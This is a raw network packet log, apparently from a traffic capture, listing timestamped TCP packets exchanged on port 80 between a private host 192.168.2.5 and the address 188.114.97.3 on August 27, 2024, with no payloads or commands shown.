                              Aug 27, 2024 09:48:53.414560080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.414560080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.414570093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.414572954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.414649010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.439152002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439165115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439169884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439255953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439265966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439280033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439292908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439357042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.439490080 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.484437943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499164104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499191046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499212027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499278069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499300003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499316931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499334097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499456882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499483109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499526024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499541044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499572039 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499597073 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499608040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499624968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499676943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499710083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499727011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499764919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499775887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499790907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499806881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499824047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499830008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.499866009 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.499970913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500017881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500034094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500053883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500063896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500071049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500097036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500130892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500147104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500164986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500174999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500180960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500216961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500250101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500266075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500289917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500289917 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500307083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500323057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500329018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500363111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500499010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500513077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500529051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500545979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500561953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500570059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500591993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500638008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500659943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500685930 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500741005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500757933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500775099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500782967 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500792980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500813961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.500817060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500833988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.500855923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501008034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501024008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501046896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501050949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501064062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501080036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501085997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501096010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501112938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501117945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501147985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501260996 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501276016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501291990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501307964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501319885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501327038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501353979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501410961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501426935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501451015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501508951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501527071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501562119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501605988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501621962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501636982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501652002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501652956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501668930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501725912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501741886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501741886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501828909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501847029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501862049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501872063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501878977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501897097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.501903057 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501936913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.501988888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502001047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502024889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502039909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502042055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502057076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502072096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502082109 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502089977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502110958 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502167940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502192974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502208948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502222061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502228022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502244949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502249002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502263069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502326012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502430916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502446890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502463102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502480030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502486944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502564907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502605915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502623081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502638102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502650023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502651930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502667904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502672911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502684116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502700090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502707005 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502743006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502906084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502922058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502938032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502953053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502968073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502976894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.502983093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.502999067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.503004074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503020048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503036976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503058910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503076077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503077030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.503093958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503108978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.503144026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.503267050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503283978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503299952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503319979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503330946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.503336906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.503413916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.527674913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527704000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527717113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527770042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527786016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527800083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527869940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527890921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.527995110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.528171062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.587848902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.587874889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.587892056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.587948084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588012934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588028908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588044882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588063002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588113070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588128090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588191032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588207006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588222027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588237047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588262081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588327885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588381052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588395119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588409901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588428020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588519096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588534117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588548899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588614941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588628054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588644981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588745117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588758945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588767052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588799000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588855028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588943958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588959932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588974953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.588989973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589083910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589097977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589112997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589128017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589150906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589248896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589265108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589281082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589369059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589384079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589400053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589415073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589431047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589602947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589627028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589642048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589657068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589777946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589792013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589807034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589822054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589838028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589907885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589922905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.589936018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590004921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590018988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590033054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590131044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590145111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590159893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590174913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590188980 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590321064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590332985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590348005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590362072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590377092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590394020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590516090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590538025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590562105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590578079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590678930 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.590703011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590718031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590740919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590756893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590773106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590790033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590858936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590873957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590962887 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.590980053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.590995073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591010094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591025114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591038942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591048956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591074944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591183901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591197968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591212988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591228008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591228008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591243029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591259003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591259003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591274023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591284990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591320992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591355085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591474056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591489077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591512918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591527939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591548920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591548920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591566086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591574907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591582060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591597080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591609001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591612101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591625929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591634989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591650009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591664076 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591665983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591702938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.591907978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.591922998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.592015028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.616384029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616522074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616534948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616543055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616549969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616558075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616564989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616583109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.616847992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.676289082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676337957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676353931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676444054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676459074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676476002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676501036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676541090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676563978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.676603079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676619053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676687002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.676711082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.676717043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676733017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676750898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676765919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676779032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.676810026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.676826000 CEST8061383188.114.97.3192.168.2.5
